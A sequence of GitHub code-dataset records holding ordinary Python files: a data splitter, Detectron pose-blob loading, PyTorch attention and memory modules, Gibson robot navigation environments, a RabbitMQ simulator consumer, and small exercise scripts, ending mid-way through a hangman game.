parser.add_argument('target', help='Who should we consider as positive',\n choices=('Jason', 'Terry', 'Both'))\n parser.add_argument('output_dir')\n parser.add_argument('--seed', type=int, default=0)\n args = parser.parse_args()\n\n random.seed(args.seed)\n\n data = list(load_data(args.json))\n\n if args.target == 'Jason' or 
args.target == 'Terry':\n        # materialize to lists so shuffle/len/slicing work on Python 3 too\n        pos_data = list(filter(lambda d: d['author'] == args.target, data))\n    elif args.target == 'Both':\n        pos_data = list(filter(lambda d: d['author'] == 'Jason' or\n                               d['author'] == 'Terry', data))\n    neg_data = list(filter(lambda d: d['author'] != 'Jason' and\n                           d['author'] != 'Terry', data))\n\n    for d in pos_data:\n        d['label'] = 1\n    for d in neg_data:\n        d['label'] = 0\n\n    random.shuffle(pos_data)\n    random.shuffle(neg_data)\n\n    train_ratio = 0.7\n    dev_ratio = 0.2\n    assert(train_ratio + dev_ratio < 1)\n\n    pos_num_data = len(pos_data)\n    neg_num_data = len(neg_data)\n\n    pos_split1 = int(pos_num_data * train_ratio)\n    pos_split2 = int(pos_num_data * (train_ratio + dev_ratio))\n    neg_split1 = int(neg_num_data * train_ratio)\n    neg_split2 = int(neg_num_data * (train_ratio + dev_ratio))\n\n    train_data = pos_data[:pos_split1] + neg_data[:neg_split1]\n    dev_data = pos_data[pos_split1:pos_split2] + neg_data[neg_split1:neg_split2]\n    test_data = pos_data[pos_split2:] + neg_data[neg_split2:]\n\n    def write_file(filename, data):\n        with open(filename, 'w') as f:\n            for d in data:\n                f.write('{}\\n'.format(json.dumps(d)))\n\n    write_file(os.path.join(args.output_dir, 'train.json'), train_data)\n    write_file(os.path.join(args.output_dir, 'dev.json'), dev_data)\n    write_file(os.path.join(args.output_dir, 'test.json'), test_data)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"mrorii/findjatbar","sub_path":"findjatbar/split_data.py","file_name":"split_data.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"}
{"seq_id":"19217132232","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport cv2\nimport logging\nimport numpy as np\nimport os\nimport copy\n\nfrom detectron.core.config import cfg\nimport detectron.roi_data.fast_rcnn as fast_rcnn_roi_data\nimport detectron.roi_data.retinanet as retinanet_roi_data\nimport detectron.roi_data.rpn as rpn_roi_data\nimport detectron.utils.blob as blob_utils\n\nlogger = logging.getLogger(__name__)\n\n#import sys\n#sys.path.append('/home/gaomingda/softer_nms_LIP_JPPNet/detectron/LIP_JPPNet')\n#from evaluate_pose_JPPNet import draw_resized_pose\n\ndef get_minibatch_blob_names(is_training=True):\n    \"\"\"Return blob names in the order in which they are read by the data loader.\n    \"\"\"\n    # data blob: holds a batch of N images, each with 3 channels\n    blob_names = ['data']\n    blob_names += ['normalizer'] # focal loss at fast_rcnn_heads\n#    blob_names += ['normalizer_fcn'] # focal loss at mask_res_top\n#    blob_names += ['pose_pred']\n    blob_names += ['pose_pred_4']\n    blob_names += ['pose_pred_8']\n    blob_names += ['pose_pred_16']\n    blob_names += ['pose_pred_32']\n    \n    blob_names += ['pose_line_8']\n    blob_names += ['pose_line_16']\n    \n    # seg_gt_label, add segmentation on top of fpn2-5\n    blob_names += ['seg_gt_label']\n    if cfg.RPN.RPN_ON:\n        # RPN-only or end-to-end Faster R-CNN\n        blob_names += rpn_roi_data.get_rpn_blob_names(is_training=is_training)\n    elif cfg.RETINANET.RETINANET_ON:\n        blob_names += retinanet_roi_data.get_retinanet_blob_names(\n            is_training=is_training\n        )\n    else:\n        # Fast R-CNN like models trained on precomputed proposals\n        blob_names += fast_rcnn_roi_data.get_fast_rcnn_blob_names(\n            is_training=is_training\n        )\n    return blob_names\n\n\n#def get_minibatch(roidb, pose_pred_model):\ndef get_minibatch(roidb):\n    \"\"\"Given a roidb, construct a minibatch sampled from 
it.\"\"\"\n # We collect blobs from each image onto a list and then concat them into a\n # single tensor, hence we initialize each blob to an empty list\n blobs = {k: [] for k in get_minibatch_blob_names()}\n # Get the input image blob, formatted for caffe2\n# im_blob, im_scales = _get_image_blob(roidb)\n im_blob, im_scales, pose_pred, pose_line, blobs['seg_gt_label'] = _get_image_pose_blob(roidb) # pose_pred the same shape with im_blob\n blobs['data'] = im_blob\n blobs['normalizer'] = np.array([100], dtype=np.float32)\n if 'LIP' in cfg.TRAIN.DATASETS[0]:\n blobs['pose_pred_4'], blobs['pose_pred_8'], blobs['pose_pred_16'], blobs['pose_pred_32'] = _resize_pose_blob(pose_pred, channel=26)\n else:\n blobs['pose_pred_4'], blobs['pose_pred_8'], blobs['pose_pred_16'], blobs['pose_pred_32'] = _resize_pose_blob(pose_pred, channel=26)\n# blobs['pose_pred_8'], blobs['pose_pred_16'] = _resize_pose_blob_to13(pose_pred) # pose 16 to 13 channel\n# blobs['pose_sum_8'], blobs['pose_sum_16'] = pose_sum_to_onehotmap(blobs['pose_pred_8'], blobs['pose_pred_16'])\n blobs['pose_line_8'], blobs['pose_line_16'] = _resize_poseline_blob(pose_line)\n if cfg.RPN.RPN_ON:\n # RPN-only or end-to-end Faster/Mask R-CNN\n valid = rpn_roi_data.add_rpn_blobs(blobs, im_scales, roidb)\n elif cfg.RETINANET.RETINANET_ON:\n im_width, im_height = im_blob.shape[3], im_blob.shape[2]\n # im_width, im_height corresponds to the network input: padded image\n # (if needed) width and height. We pass it as input and slice the data\n # accordingly so that we don't need to use SampleAsOp\n valid = retinanet_roi_data.add_retinanet_blobs(\n blobs, im_scales, roidb, im_width, im_height\n )\n else:\n # Fast R-CNN like models trained on precomputed proposals\n valid = fast_rcnn_roi_data.add_fast_rcnn_blobs(blobs, im_scales, roidb)\n# blobs['pose_pred'] = pose_pred_model.pred_pose_batch(roidb)\n# pose_pred_model.draw_batch(blobs['pose_pred'], roidb)\n# blobs['pose_pred'] = _get_pose_pred(roidb)\n \n# logger.info(blobs['pose_pred'].shape)\n return blobs, valid\n\n\ndef _get_image_blob(roidb):\n \"\"\"Builds an input blob from the images in the roidb at the specified\n scales.\n \"\"\"\n num_images = len(roidb)\n # Sample random scales to use for each image in this batch\n scale_inds = np.random.randint(\n 0, high=len(cfg.TRAIN.SCALES), size=num_images\n )\n processed_ims = []\n im_scales = []\n for i in range(num_images):\n im = cv2.imread(roidb[i]['image'])\n assert im is not None, \\\n 'Failed to read image \\'{}\\''.format(roidb[i]['image'])\n if roidb[i]['flipped']:\n im = im[:, ::-1, :]\n target_size = cfg.TRAIN.SCALES[scale_inds[i]]\n im, im_scale = blob_utils.prep_im_for_blob(\n im, cfg.PIXEL_MEANS, target_size, cfg.TRAIN.MAX_SIZE\n )\n im_scales.append(im_scale)\n processed_ims.append(im)\n\n # Create a blob to hold the input images\n blob = blob_utils.im_list_to_blob(processed_ims)\n\n return blob, im_scales\n\ndef _get_pose_pred(roidb, channel=16):\n \"\"\"get LIP_JPP pose prediction from .bin file\n \"\"\"\n num_images = len(roidb)\n if 'LIP' in cfg.TRAIN.DATASETS[0]:\n# pred_pose_data = '/home/gaomingda/Downloads/gaomingda/dataset/LIP_JPP_pred_pose/train'\n pred_pose_data = '/home/gaomingda/datasets/lip_body25/train_images'\n pose_line_data = '/home/gaomingda/Downloads/gaomingda/dataset/LIP_JPP_pose_edge/train'\n if 'ATR' in cfg.TRAIN.DATASETS[0]:\n# pred_pose_data = '/home/gaomingda/Downloads/gaomingda/dataset/ATR_JPP_pred_pose'\n# pred_pose_data = '/home/gaomingda/Downloads/gaomingda/dataset/ATR_JPP_crop_pred_pose'\n pred_pose_data = 
'/home/gaomingda/Downloads/gaomingda/dataset/ATR_openpose'\n if 'LIP' in cfg.TRAIN.DATASETS[0]:\n pose_blob = np.zeros((num_images, 48, 48, channel), dtype=np.float32)\n else: # ATR\n pose_blob = np.zeros((num_images, 48, 48, 26), dtype=np.float32)\n pose_line_blob = np.zeros((num_images, 48, 48), dtype=np.float32)\n for i in range(num_images):\n entry = roidb[i]\n if 'ATR' in cfg.TRAIN.DATASETS[0]:\n if entry['flipped']:\n pred_pose_path = os.path.join(pred_pose_data, 'heatmap_flip', entry['id']+'.bin')\n else:\n pred_pose_path = os.path.join(pred_pose_data, 'heatmap', entry['id']+'.bin')\n pred_ = np.fromfile(pred_pose_path, dtype=np.float32)\n pred_ = pred_.reshape(48, 48, 26)\n pose_blob[i] = pred_\n else: # LIP\n if entry['flipped']:\n pred_pose_path = os.path.join(pred_pose_data, 'heatmap_flip', entry['id']+'.bin')\n else:\n pred_pose_path = os.path.join(pred_pose_data, 'heatmap', entry['id']+'.bin')\n pred_ = np.fromfile(pred_pose_path, dtype=np.float32)\n pred_ = pred_.reshape(48, 48, channel)\n # pose line\n #pose_line = np.fromfile(os.path.join(pose_line_data, entry['id']+'.bin'), dtype=np.float32)\n #pose_line = pose_line.reshape(48, 48)\n pose_line = np.zeros((48, 48), dtype=np.float32)\n# if entry['flipped']:\n# pred_ = flip_pose(pred_)\n# # pose line\n# pose_line = pose_line[:, ::-1]\n pose_blob[i] = pred_\n # pose line \n pose_line_blob[i] = pose_line\n # select 0-15 channel\n #print(\"train body25, select poses 0-16 channel\")\n pose_blob = pose_blob[:, :, :, 0:16]\n return pose_blob , pose_line_blob\n\ndef flip_pose(pose):\n \"\"\"input: pose, is array of size(none, none, 16)\n \"\"\"\n flip_pose = np.zeros(pose.shape, dtype=np.float32)\n flip_pose[:, :, 0] = pose[:, :, 5]\n flip_pose[:, :, 1] = pose[:, :, 4]\n flip_pose[:, :, 2] = pose[:, :, 3]\n flip_pose[:, :, 3] = pose[:, :, 2]\n flip_pose[:, :, 4] = pose[:, :, 1]\n flip_pose[:, :, 5] = pose[:, :, 0]\n flip_pose[:, :, 10] = pose[:, :, 15]\n flip_pose[:, :, 11] = pose[:, :, 14]\n flip_pose[:, :, 12] = pose[:, :, 13]\n flip_pose[:, :, 13] = pose[:, :, 12]\n flip_pose[:, :, 14] = pose[:, :, 11]\n flip_pose[:, :, 15] = pose[:, :, 10]\n flip_pose[:, :, 6] = pose[:, :, 6]\n flip_pose[:, :, 7] = pose[:, :, 7]\n flip_pose[:, :, 8] = pose[:, :, 8]\n flip_pose[:, :, 9] = pose[:, :, 9]\n return flip_pose[:, ::-1, :]\n\n\ndef _get_image_pose_blob(roidb):\n \"\"\"Builds an input blob from the images in the roidb at the specified\n scales.\n \"\"\"\n num_images = len(roidb)\n # Sample random scales to use for each image in this batch\n scale_inds = np.random.randint(\n 0, high=len(cfg.TRAIN.SCALES), size=num_images\n )\n processed_ims = []\n im_scales = []\n for i in range(num_images):\n im = cv2.imread(roidb[i]['image'])\n assert im is not None, \\\n 'Failed to read image \\'{}\\''.format(roidb[i]['image'])\n if roidb[i]['flipped']:\n im = im[:, ::-1, :]\n target_size = cfg.TRAIN.SCALES[scale_inds[i]]\n im, im_scale = blob_utils.prep_im_for_blob(\n im, cfg.PIXEL_MEANS, target_size, cfg.TRAIN.MAX_SIZE\n )\n im_scales.append(im_scale)\n processed_ims.append(im)\n\n # Create a blob to hold the input images\n # pose_line: (num_images, 48, 48)\n poses, pose_line = _get_pose_pred(roidb, channel=26)\n# show_pose(roidb, poses, im_scales)\n # seg_gt label\n seg_gt_list = _prep_seg_gt_for_blob(roidb)\n\n im_blob, pose_blob, pose_line_blob, seg_gt_blob = blob_utils.im_list_to_blob_andPose(processed_ims, poses, pose_line, seg_gt_list)\n# show_pose(roidb, pose_blob, im_scales)\n# blob = blob_utils.im_list_to_blob(processed_ims)\n\n return 
im_blob, im_scales, pose_blob, pose_line_blob, seg_gt_blob\n\ndef show_pose(roidb, pose_blob, im_scales):\n num_images = len(roidb)\n for i in range(num_images):\n pose_blob_i = pose_blob[i]\n pred_poses = []\n for j in range(16):\n channel_ = pose_blob_i[:, :, j]\n r_, c_ = np.unravel_index(channel_.argmax(), channel_.shape)\n# if channel_[r_, c_]>0.3:\n# pred_poses.append([r_, c_])\n# else:\n# pred_poses.append([-1, -1])\n pred_poses.append([r_, c_])\n draw_resized_pose(roidb[i]['image'], pred_poses, im_scales[i], roidb[i]['flipped'])\n\ndef _resize_pose_blob(pose_pred, channel=16):\n n, h, w, channel = pose_pred.shape\n pose_shrink4 = np.zeros((n, int(h/4.), int(w/4.), channel), dtype=np.float32)\n pose_shrink8 = np.zeros((n, int(h/8.), int(w/8.), channel), dtype=np.float32)\n pose_shrink16 = np.zeros((n, int(h/16.), int(w/16.), channel), dtype=np.float32)\n pose_shrink32 = np.zeros((n, int(h/32.), int(w/32.), channel), dtype=np.float32)\n for i in range(n):\n pose_shrink4[i] = cv2.resize(pose_pred[i, :, :, :], None, None, 1./4., 1./4.,\n interpolation=cv2.INTER_LINEAR)\n pose_shrink8[i] = cv2.resize(pose_pred[i, :, :, :], None, None, 1./8., 1./8.,\n interpolation=cv2.INTER_LINEAR)\n pose_shrink16[i] = cv2.resize(pose_pred[i], None, None, 1./16., 1./16.,\n interpolation=cv2.INTER_LINEAR)\n pose_shrink32[i] = cv2.resize(pose_pred[i], None, None, 1./32., 1./32.,\n interpolation=cv2.INTER_LINEAR)\n return pose_shrink4, pose_shrink8, pose_shrink16, pose_shrink32\n\ndef _resize_poseline_blob(pose_pred):\n n, h, w = pose_pred.shape\n# pose_shrink4 = np.zeros((n, int(h/4.), int(w/4.)), dtype=np.float32)\n pose_shrink8 = np.zeros((n, int(h/8.), int(w/8.)), dtype=np.float32)\n pose_shrink16 = np.zeros((n, int(h/16.), int(w/16.)), dtype=np.float32)\n for i in range(n):\n# pose_shrink4[i] = cv2.resize(pose_pred[i, :, :], None, None, 1./4., 1./4.,\n# interpolation=cv2.INTER_NEAREST)\n pose_shrink8[i] = cv2.resize(pose_pred[i, :, :], None, None, 1./8., 1./8.,\n interpolation=cv2.INTER_NEAREST)\n pose_shrink16[i] = cv2.resize(pose_pred[i], None, None, 1./16., 1./16.,\n interpolation=cv2.INTER_NEAREST)\n return pose_shrink8, pose_shrink16\n\ndef _resize_pose_blob_to13(pose_pred):\n \"\"\"first combine 16 channel pose pred to 13 channel(6,B_Pelvis ,B_Spine ,B_Neck ,B_Head)\n then shrink 1./8, 1.16 the 13 channel pose blob \n \"\"\"\n n, h, w, _ = pose_pred.shape\n pose_13 = np.zeros((n, h, w, 13), dtype=np.float32)\n pose_13[:, :, :, 0:6] = pose_pred[:, :, :, 0:6]\n pose_13[:, :, :, 7] = pose_pred[:, :, :, 10]\n pose_13[:, :, :, 6] = pose_pred[:, :, :, 6]+pose_pred[:, :, :, 7]+pose_pred[:, :, :, 8]+pose_pred[:, :, :, 9]\n return _resize_pose_blob(pose_13, channel=13)\n\ndef pose_sum_to_onehotmap(pose_blob_8, pose_blob_16):\n \"\"\"pose_blob: shape (num_imgs, h, w, 16)\n pose_blob_8: same shape with res3\n pose_blob_16: same shape with res4\n \"\"\"\n n, h, w, c = pose_blob_8.shape\n _, h_16, w_16, _ = pose_blob_16.shape\n \n pose_sum_8 = np.sum(pose_blob_8, axis=3)\n pose_sum_16 = np.sum(pose_blob_16, axis=3)\n \n one_hot_blob_res3 = np.zeros((n, 512, h, w), dtype=np.float32)\n one_hot_blob_res4 = np.zeros((n, 1024, h_16, w_16), dtype=np.float32)\n for i in range(n):\n one_hot_blob_res3[i, :, :, :] = pose_sum_8[i]\n one_hot_blob_res4[i, :, :, :] = pose_sum_16[i]\n return one_hot_blob_res3, one_hot_blob_res4\n\ndef _prep_seg_gt_for_blob(roidb):\n \"\"\"load seg gt label\n return: 2D array\n return: a list of seg_gt array(H, W)\n \"\"\"\n seg_gt_list = []\n for entry in roidb:\n seg_gt = 
cv2.imread(entry['ins_seg'], 0)\n        if entry['flipped']:\n            seg_gt = seg_gt[:, ::-1]\n        label_ = copy.deepcopy(seg_gt)\n        dataset_name = cfg.TRAIN.DATASETS[0]\n        orig2flipped = {}\n        if 'LIP' in dataset_name:\n            orig2flipped = {14:15, 15:14, 16:17, 17:16, 18:19, 19:18}\n        if 'ATR' in dataset_name:\n            orig2flipped = {\n                9: 10, 10: 9, 12: 13, 13: 12, 14: 15, 15: 14}\n        \n        # swap paired left/right part labels only for horizontally flipped images\n        if entry['flipped']:\n            for i in orig2flipped.keys():\n                ind_i = np.where(label_==i)\n                if len(ind_i[0])==0:\n                    continue\n                seg_gt[ind_i] = int(orig2flipped[i])\n        \n        # seg_gt = cv2.resize(seg_gt, None, None, fx=im_scale, fy=im_scale,\n        #                     interpolation=cv2.INTER_NEAREST)\n        seg_gt = np.array(seg_gt, dtype=np.int32)\n        seg_gt_list.append(seg_gt)\n\n    return seg_gt_list","repo_name":"994374821/maskrcnn_body25","sub_path":"detectron/roi_data/minibatch.py","file_name":"minibatch.py","file_ext":"py","file_size_in_byte":14618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"22886472465","text":"class Solution:\n    def letterCombinations(self, digits):\n        ans = []\n        phoneDict = {\n            \"2\" : [\"a\", \"b\", \"c\"],\n            \"3\" : [\"d\", \"e\", \"f\"],\n            \"4\" : [\"g\", \"h\", \"i\"],\n            \"5\" : [\"j\", \"k\", \"l\"],\n            \"6\" : [\"m\", \"n\", \"o\"],\n            \"7\" : [\"p\", \"q\", \"r\", \"s\"],\n            \"8\" : [\"t\", \"u\", \"v\"],\n            \"9\" : [\"w\", \"x\", \"y\", \"z\"]\n        }\n        letters = []\n        for digit in digits:\n            letters.append(phoneDict[digit])\n\n        self.combine_letters(letters, 0, \"\", ans)\n\n        return ans\n\n    def combine_letters(self, letters, index, curr_comb, ans):\n        if index < len(letters):\n            for letter in letters[index]:\n                self.combine_letters(letters, index + 1, curr_comb + letter, ans)\n        \n        if len(curr_comb) == len(letters):\n            ans.append(curr_comb)\n\nsolution = Solution()\nprint(solution.letterCombinations(\"23\"))","repo_name":"henriqueconte/Challenges","sub_path":"LeetCode/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"44284475521","text":"month = int(input(\"Enter the current month (1 to 12): \"))\n\nspring_months = [3, 4, 5]\nsummer_months = [6, 7, 8]\nautumn_months = [9, 10, 11]\nwinter_months = [12, 1, 2]\n\nif month in spring_months:\n    season = \"Spring\"\nelif month in summer_months:\n    season = \"Summer\"\nelif month in autumn_months:\n    season = \"Autumn\"\nelse:\n    season = \"Winter\"\n\nprint(f\"The season for month {month} is {season}.\")\n","repo_name":"liorbn03/myrepository","sub_path":"Week 7/Day 2/XP Gold/EXE02.py","file_name":"EXE02.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"2782431975","text":"import torch\nfrom torch import nn\nimport math\nfrom math import sqrt, pi\nfrom torch.nn import functional as F\n\n\nclass MemoryBlock(nn.Module):\n    def __init__(self, mem_dim, z_dim, shrink_thres=0.005, tem=0.5):\n        super().__init__()\n        self.mem_dim = mem_dim\n        self.z_dim = z_dim\n        self.shrink_thres = shrink_thres\n        self.tem = tem\n        self.register_buffer(\"mem\", torch.randn(self.mem_dim, self.z_dim))\n        self.register_buffer(\"mem_ptr\", torch.zeros(1, dtype=torch.long))\n\n        self.reset_parameters()\n\n    def reset_parameters(self):\n        stdv = 1. 
/ math.sqrt(self.mem.size(1))\n self.mem.data.uniform_(-stdv, stdv)\n\n @torch.no_grad()\n def update_mem(self, z):\n batch_size = z.shape[0] # z, B x C\n ptr = int(self.mem_ptr)\n assert self.mem_dim % batch_size == 0\n\n # replace the keys at ptr (dequeue and enqueue)\n self.mem[ptr:ptr + batch_size, :] = z # mem, M x C\n ptr = (ptr + batch_size) % self.mem_dim # move pointer\n\n self.mem_ptr[0] = ptr\n\n def hard_shrink_relu(self, x, lambd=0, epsilon=1e-12):\n x = (F.relu(x-lambd) * x) / (torch.abs(x - lambd) + epsilon)\n return x\n\n def forward(self, x):\n att_weight = torch.mm(x, self.mem.T)\n # filter_value = -float('Inf')\n # indices_to_remove = att_weight < torch.topk(att_weight, k=20, dim=-1)[0][..., -1, None]\n # att_weight[indices_to_remove] = filter_value\n att_weight = F.softmax(att_weight/self.tem, dim=1)\n\n # ReLU based shrinkage, hard shrinkage for positive value\n if (self.shrink_thres > 0):\n att_weight = self.hard_shrink_relu(att_weight, lambd=self.shrink_thres)\n att_weight = F.normalize(att_weight, p=1, dim=1)\n\n output = torch.mm(att_weight, self.mem)\n return output\n\n\nclass Attention(nn.Module):\n def __init__(self, d_model, attention_dropout=0.1):\n super().__init__()\n self.dropout = nn.Dropout(attention_dropout)\n self.norm = nn.LayerNorm(d_model)\n\n self.query_projection = nn.Linear(d_model, d_model)\n self.key_projection = nn.Linear(d_model, d_model)\n self.value_projection = nn.Linear(d_model, d_model)\n\n self.out_projection = nn.Linear(d_model, d_model)\n \n def cos_score(self, q, k):\n norm_q = torch.norm(q, dim=1).unsqueeze(-1)\n norm_k = torch.norm(k, dim=1).unsqueeze(-1)\n return torch.matmul(q, k.transpose(-1,1)) / (norm_q * norm_k)\n\n def forward(self, q, k, v):\n q = self.query_projection(q).unsqueeze(-1)\n k = self.key_projection(k).unsqueeze(-1)\n v = self.value_projection(v).unsqueeze(-1)\n s = self.dropout(self.cos_score(q, k))\n out = torch.matmul(s, v).squeeze(-1)\n return self.norm(q.squeeze(-1) + self.out_projection(out))\n\n\nclass TFBlock(nn.Module):\n def __init__(self, d_model):\n super().__init__()\n self.g_attn = Attention(d_model=d_model)\n self.p_attn = Attention(d_model=d_model)\n\n def forward(self, z_g, z_p):\n z_g = self.g_attn(z_g, z_p, z_p)\n z_p = self.p_attn(z_p, z_g, z_g)\n return z_g, z_p\n\n\nclass StyleBlock(nn.Module):\n def __init__(self, data_n: int, z_dim: int):\n super().__init__()\n self.n = data_n\n self.style = nn.Parameter(torch.Tensor(data_n, z_dim))\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1. 
/ math.sqrt(self.style.size(1))\n        self.style.data.uniform_(-stdv, stdv)\n\n    def forward(self, z, batchid):\n        if self.n == 1:\n            return z - self.style\n        else:\n            s = torch.mm(batchid, self.style)\n            return z - s","repo_name":"Catchxu/STANDS","sub_path":"stands/model/_block.py","file_name":"_block.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"37541342384","text":"##set_a = []\n##def squares(i):\n##    set_a = [i*i for i in range(0, i+1)]\n##    return set_a\n##\n###main\n##print(squares(10))\n\n#-------------------------------------------------------------\n\n##numbers = []\n##userLower = int(input(\"Please enter a lower bound (int): \"))\n##userUpper = int(input(\"Please enter an upper bound (int): \"))\n##userDivide = int(input(\"Please enter a number to divide by (int): \"))\n##\n##numbers = [num for num in range (userLower, userUpper+1) if num%userDivide == 0]\n##print(\"All of the numbers between\", userLower ,\"and\", userUpper, \"that are divisible by\",userDivide,\":\", numbers)\n\n#--------------------------------------------------------------\nvowels=[\"a\", \"e\", \"i\", \"o\", \"u\"]\nfile_contents = [line.strip(\"\\n\") for line in open(\"words.txt\", \"r\")]\nprint(\"All words in the file:\", file_contents)\n\nfor word in file_contents:\n    # str.strip() does not accept a list, so count vowel occurrences instead\n    if sum(word.count(v) for v in vowels) >= 2:\n        print(\"The words in the file that contain 2 or more vowels:\", word)\n","repo_name":"morrisrl/Python_Scraping","sub_path":"1_23_18_practice.py","file_name":"1_23_18_practice.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"13646260685","text":"\r\nimport math\r\nimport pika\r\nimport numpy as np\r\nimport callback\r\n\r\n\r\ndef simulate(time_serialized):\r\n    \"\"\"\r\n    Simulator function to make PV simulator\r\n    \"\"\"\r\n    mu = 10\r\n    variance = 2\r\n    sigma = math.sqrt(variance)\r\n    # pv simulation: gaussian-shaped profile over the serialized time\r\n    return np.exp(-(time_serialized - mu)**2 / (2 * sigma**2))\r\n\r\n\r\ndef start_receive_msg():\r\n    \"\"\"\r\n    This method will consume the msgs from the rabbitmq\r\n    \"\"\"\r\n    connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\r\n    channel = connection.channel()\r\n    # queue declaration\r\n    channel.queue_declare(queue='meter', durable=True)\r\n    channel.basic_consume(queue='meter',\r\n                          on_message_callback=callback.callback_func)\r\n    print('All messages are consumed.. 
Waiting for new messages')\r\n channel.start_consuming()\r\n\r\n\r\nif __name__ == '__main__':\r\n # Start receiving msg from Rabbit MQ\r\n start_receive_msg()\r\n\r\n","repo_name":"RahulNewbie/PV_Simulator","sub_path":"simulator/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"722650489","text":"from gibson.envs.env_modalities import CameraRobotEnv, BaseRobotEnv, SemanticRobotEnv\nfrom gibson.envs.husky_env import HuskyNavigateEnv\nfrom gibson.core.physics.robot_locomotors import Husky\nfrom gibson.data.datasets import get_model_path\nfrom gibson import assets\nimport numpy as np\nimport csv\nimport os\nimport subprocess, signal\n\ntracking_camera = {\n 'yaw': 110,\n 'z_offset': 0.5,\n 'distance': 1,\n 'pitch': -20\n}\n\nclass HuskyRandomEnv(HuskyNavigateEnv):\n def __init__(self, config, gpu_count=0):\n self.config = self.parse_config(config)\n assert(self.config[\"envname\"] == self.__class__.__name__ or self.config[\"envname\"] == \"TestEnv\")\n CameraRobotEnv.__init__(self, self.config, gpu_count, \n scene_type=\"building\",\n tracking_camera=tracking_camera)\n self.robot_introduce(Husky(self.config, env=self))\n self.scene_introduce()\n self.model_id = self.config[\"model_id\"]\n self.scenarios = self.get_scenarios(self.config[\"scenarios\"])\n self.n_scenarios = len(self.scenarios)\n\n def get_scenarios(self, scenario_size):\n scenarios_path = os.path.join(os.path.dirname(os.path.abspath(assets.__file__)), 'navigation_scenarios')\n scenario_file = os.path.join(scenarios_path, 'pointgoal_gibson_{}_v1.csv'.format(scenario_size))\n scenarios = []\n with open(scenario_file, 'r') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=',')\n for row in reader:\n if row['sceneId'] == self.model_id:\n scenarios.append(row)\n return scenarios\n\n def _reset(self):\n scenario_index = np.random.randint(self.n_scenarios)\n scenario = self.scenarios[scenario_index]\n self.config[\"initial_pos\"] = [float(scenario['startX']),\n float(scenario['startY']),\n float(scenario['startZ']) + 0.5]\n self.config[\"target_pos\"] = [float(scenario['goalX']),\n float(scenario['goalY']),\n float(scenario['goalZ'])]\n print(\"xi\", self.config[\"initial_pos\"])\n return super(HuskyRandomEnv, self)._reset()\n\n\nclass HuskyMultiSceneEnv(HuskyNavigateEnv):\n def __init__(self, config, gpu_count=0):\n self.config = self.parse_config(config)\n assert(self.config[\"envname\"] == self.__class__.__name__ or self.config[\"envname\"] == \"TestEnv\")\n CameraRobotEnv.__init__(self, self.config, gpu_count, \n scene_type=\"building\",\n tracking_camera=tracking_camera)\n self.robot_introduce(Husky(self.config, env=self))\n self.scenarios = self.get_scenarios(self.config[\"scenarios\"])\n self.n_scenarios = len(self.scenarios)\n\n def get_scenarios(self, scenario_size):\n scenarios_path = os.path.join(os.path.dirname(os.path.abspath(assets.__file__)), 'navigation_scenarios')\n scenario_file = os.path.join(scenarios_path, 'pointgoal_gibson_{}_v1.csv'.format(scenario_size))\n with open(scenario_file, 'r') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=',')\n return [row for row in reader]\n\n def kill_depth_render(self):\n process = subprocess.Popen(['ps', '-A'], stdout=subprocess.PIPE)\n out, err = process.communicate()\n for line in out.splitlines():\n if 'depth_render' in str(line):\n pid = int(line.split(None, 1)[0])\n os.kill(pid, signal.SIGKILL)\n print(\"Successfully 
killed depth_render\")\n\n def _reset(self):\n # Randomly select a scenario\n scenario_index = np.random.randint(self.n_scenarios)\n scenario = self.scenarios[scenario_index]\n print(\"Selected scenario:\", scenario)\n self.model_id = self.config[\"model_id\"] = scenario['sceneId']\n self.model_path = get_model_path(self.model_id)\n self.config[\"initial_pos\"] = [float(scenario['startX']),\n float(scenario['startY']),\n float(scenario['startZ'])]\n self.config[\"target_pos\"] = [float(scenario['goalX']),\n float(scenario['goalY']),\n float(scenario['goalZ'])]\n\n self.config[\"target_orn\"] = [0, 0, 0]\n self.config[\"initial_orn\"] = [0, 0, float(scenario['startAngle'])]\n self.kill_depth_render()\n self.setup_rendering_camera()\n self.scene_introduce()\n return super(HuskyMultiSceneEnv, self)._reset()","repo_name":"alexsax/midlevel-reps","sub_path":"gibson/gibson/envs/random_env.py","file_name":"random_env.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"37"} +{"seq_id":"20636634407","text":"import sys\ninput = sys.stdin.readline\n\n\nclass Solution: \n def ACM_hotel(self, H: int, W: int, N: int):\n floor = str(N%H)\n door = str((N//H)+1)\n if floor == '0':\n floor = str(H)\n door = str((N//H))\n if len(door) == 1:\n door = '0' + door\n return floor + door\n \n\n\nfor _ in range(int(input())):\n H, W, N = map(int, input().split())\n print(Solution().ACM_hotel(H,W,N))","repo_name":"PARKINHYO/Algorithm","sub_path":"BOJ/10250/10250.py","file_name":"10250.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"25063702068","text":"from words import words\nimport random\nimport string\n\n\ndef valid_word():\n word = random.choice(words)\n while True:\n if '-' not in word and ' ' not in word:\n return word\n\n\ndef hangman():\n word = valid_word().upper()\n letters_guessed = set()\n letters_to_guess = set(word)\n validator = 